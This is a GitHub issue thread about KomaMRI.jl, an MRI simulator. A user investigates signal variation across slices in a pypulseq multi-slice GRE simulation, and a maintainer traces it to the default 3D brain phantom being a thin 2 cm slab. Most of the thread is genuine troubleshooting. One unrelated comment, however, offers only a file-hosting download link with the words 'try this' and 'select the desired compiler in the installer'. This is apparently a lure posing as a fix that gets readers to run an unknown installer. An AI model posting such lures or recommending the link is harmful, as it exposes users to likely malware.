### ISSUE TITLE
Multi-slice acquisition with 3D phantom

### ISSUE THREAD

**Issue by aTrotier** [JuliaHealth/KomaMRI.jl#474]
### What happened?

Hi,
I would like to create a simultaneous multi-slice (SMS) example for a course.

First, I created with pypulseq a standard Multi-slice GRE sequence with long TR=1000ms in order to not worry about the spoiling. 

The images are ok but with signal / contrast variation along the slice dimension
<img width="490" alt="image" src="https://github.com/user-attachments/assets/0134924b-8cd0-493d-a4d9-bfe0d31513d0">

With phantom2D i have the same issue : 
<img width="490" alt="image" src="https://github.com/user-attachments/assets/045fc738-f7c2-4386-817c-eedae06b29f7">

If I try with the [EPI_MS from the example repository](https://github.com/JuliaHealth/KomaMRI.jl/blob/master/examples/1.sequences/epi_multislice.seq)
I think I have the same issue (hard to tell with only 3 slices, I think it happens when I go further away from isocenter)

<img width="488" alt="image" src="https://github.com/user-attachments/assets/fe67181a-dd71-461d-a849-dc707c9e4020">

In order to change the slice position I am using this line of code in pulseq :
```python
    rf_1.freq_offset = gz_1.amplitude * slice_gap * (sl - round((NSlices - 1) / 2))
```
Any idea ?

### Environment

```Markdown
OS x86_64-linux-gnu
Julia 1.10.3
KomaMRIPlots 0.8.3
KomaMRIFiles 0.8.2
KomaMRI 0.8.2
KomaMRICore 0.8.3
KomaMRIBase 0.8.5
```

**Comment by gabriel-mauricioo** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by cncastillo** [comment]
Hi! Hard to say. What do the different images mean? 20 slices are acquired simultaneously? or are the slices acquired sequentially?

Interestingly, the problem is also observed for the EPI_MS example; at least when simulating independently, the slice profiles have the same magnitude. Maybe a larger delay must be included between acquisitions for the magnetization to recover.

I will try running the MS EPI example using the development branch in #458, which should more precisely simulate RF pulses to discard a simulation accuracy problem

**Comment by aTrotier** [comment]
The slice are acquired sequentially. I also tried to acquire each slice in different sequence en get the same results :

<img width="87" alt="Screenshot 2024-09-05 at 10 04 23" src="https://github.com/user-attachments/assets/8adab7ef-6610-4b78-8fb8-46720b1bf977">

If needed you can find attach the sequence (.ipynb and .seq) and reco (.jl)
[GRE_MS.zip](https://github.com/user-attachments/files/16886112/GRE_MS.zip)

**Comment by aTrotier** [comment]
@cncastillo do you still observe this on the dev branch ?

**Comment by cncastillo** [comment]
Hi, in the latest version Koma v0.9 I get this:

GRE_SMS_slX.seq
X = 0, 1, 2, 3, 4
![image](https://github.com/user-attachments/assets/55e37837-5a4d-4fbe-be67-f577291d19ea)

Is this more similar to what you expected?

**Comment by aTrotier** [comment]
Not really we still see the signal variation along the slice direction.

**Comment by cncastillo** [comment]
Upon further examination, it seems that the phantom could be the problem. By default, `phantom_3D` is a thin slab of 2cm (z from -1cm to 1cm). The slice thickness (3mm) and slice gaps (10mm) of the sequence make it so the excitation goes beyond the phantom (x-axis in cm):

![image](https://github.com/user-attachments/assets/1925e91c-c028-4f4b-9016-9618f2bf4960)

By modifying the phantom to 

```julia
obj = brain_phantom3D(;start_end=[130, 230]) # z from -2.5 cm to 2.5 cm
```
I get:

![image](https://github.com/user-attachments/assets/b575583e-acaf-45d1-9900-652c6bf65c7f)

**Comment by cncastillo** [comment]
The docstring for `brain_phantom3D` does not mention it, so that needs to be better explained. But it is mentioned here: https://juliahealth.org/KomaMRI.jl/stable/tutorial/04-3DSliceSelective/

A section at the end of that tutorial could be helpful.

Now ... even I forgot that `brain_phantom3D` was not the whole head. So maybe we can remove the `start_end` thing and always do the complete head. If a smaller slab is needed, the user can do `obj[abs.(obj.z) .< 3e-2]` (z from -3cm to 3 cm), for example. What do you think?

**Comment by cncastillo** [comment]
Yeah it sounds reasonable. I will do that now, and update the tutorial accordingly.

Off course, If you have any cool example I would be glad to put it in the tutorials as well.
